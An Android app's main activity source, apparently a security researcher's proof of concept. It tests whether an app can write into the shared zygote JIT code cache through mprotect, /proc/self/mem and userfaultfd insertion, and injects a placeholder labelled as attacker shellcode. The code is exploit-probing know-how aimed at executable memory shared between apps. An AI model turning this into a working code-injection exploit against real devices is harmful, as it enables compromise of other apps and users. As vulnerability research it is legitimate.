package com.google.p0.jannh.arthax;

import androidx.appcompat.app.AppCompatActivity;

import android.os.Bundle;
import android.system.Os;
import android.system.OsConstants;
import android.util.Log;
import android.view.View;
import android.widget.TextView;

import com.google.p0.jannh.arthax.databinding.ActivityMainBinding;

import java.io.BufferedReader;
import java.io.FileDescriptor;
import java.io.FileReader;
import java.nio.charset.StandardCharsets;

public class MainActivity extends AppCompatActivity {

    // Used to load the 'arthax' library on application startup.
    static {
        System.loadLibrary("arthax");
    }

    private ActivityMainBinding binding;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        binding = ActivityMainBinding.inflate(getLayoutInflater());
        setContentView(binding.getRoot());

        /*

        // Example of a call to a native method
        TextView tv = binding.sampleText;
        tv.setText(stringFromJNI());
        */

        runTest();
    }

    public native int nativeMprotectRWX(long start, long len);
    /* userfaultfd() plus UFFDIO_API handshake */
    public native int nativeUserfaultfd();
    public native int nativeRegisterUserfault(int fd, long start, long len);
    public native int nativeInsertUserfault(int fd, long addr, byte[] data);
    public native void nativeClose(int fd);

    public void runTest() {
        long startAddr;
        long endAddr;
        long mappingLength;
        try {
            // locate jit-zygote-cache
            BufferedReader br = new BufferedReader(new FileReader("/proc/self/maps"));
            String line;
            while (true) {
                line = br.readLine();
                if (line == null)
                    throw new RuntimeException("no RX jit-zygote-cache found");
                if (line.contains("/memfd:jit-zygote-cache") && line.contains(" r-xs "))
                    break;
            }
            String[] line_parts = line.split(" ");
            String[] range_parts = line_parts[0].split("-");
            startAddr = Long.parseUnsignedLong(range_parts[0], 16);
            endAddr = Long.parseUnsignedLong(range_parts[1], 16);
            mappingLength = endAddr - startAddr;
        } catch (Exception e) {
            e.printStackTrace();
            return;
        }

        // test: we can't mprotect it to writable because of SELinux; this should generate an AVC denial like:
        // p0.jannh.arthax: type=1400 audit(0.0:70124): avc: denied { write execute } for path=2F6D656D66643A6A69742D7A79676F74652D6361636865202864656C6574656429 dev="tmpfs" ino=37180 scontext=u:r:untrusted_app:s0:c252,c257,c512,c768 tcontext=u:object_r:zygote_tmpfs:s0 tclass=file permissive=0 app=com.google.p0.jannh.arthax
        Log.e("ART-hax", "found r-xs jit-zygote-cache, from "+Long.toHexString(startAddr)+" to "+Long.toHexString(endAddr)+", length "+Long.toHexString(mappingLength));
        int result = nativeMprotectRWX(startAddr, mappingLength);
        Log.e("ART-hax", "mprotect(rwx) returned: "+Os.strerror(-result));

        // test: FOLL_FORCE has no effect on shared mappings
        try {
            FileDescriptor mem_fd = Os.open("/proc/self/mem", OsConstants.O_RDWR, 0);
            byte[] test_bytes = new byte[4];
            int num_read = Os.pread(mem_fd, test_bytes, 0, test_bytes.length, startAddr);
            Log.e("ART-hax", "pread returned: " + num_read);
            if (num_read == test_bytes.length) {
                int num_written = Os.pwrite(mem_fd, test_bytes, 0, test_bytes.length, startAddr);
                Log.e("ART-hax", "pwrite returned: " + num_read);
            }
        } catch (Throwable e) {
            e.printStackTrace();
        }

        // test: userfaultfd insertion
        int uffd = nativeUserfaultfd();
        if (uffd < 0) {
            Log.e("ART-hax", "userfaultfd returned: "+Os.strerror(-uffd));
        } else {
            Log.e("ART-hax", "created userfaultfd: "+uffd);
            try {
                long insertAddr = endAddr-0x1000;
                int reg_result = nativeRegisterUserfault(uffd, insertAddr, 0x1000);
                if (reg_result != 0) {
                    Log.e("ART-hax", "uffd register failed: " + Os.strerror(-reg_result));
                    return;
                }
                byte[] dummy_code = new byte[0x1000];
                byte[] string_bytes = "<<<attacker-controlled shellcode>>>\n".getBytes(StandardCharsets.UTF_8);
                System.arraycopy(string_bytes, 0, dummy_code, 0, string_bytes.length);

                int insert_result = nativeInsertUserfault(uffd, insertAddr, dummy_code);
                if (insert_result != 0) {
                    Log.e("ART-hax", "uffd insert failed: "+Os.strerror(-insert_result));
                    return;
                }
                Log.e("ART-hax", "uffd insert SUCCESS at "+Long.toHexString(insertAddr));
            } finally {
                nativeClose(uffd);
            }
        }
    }
}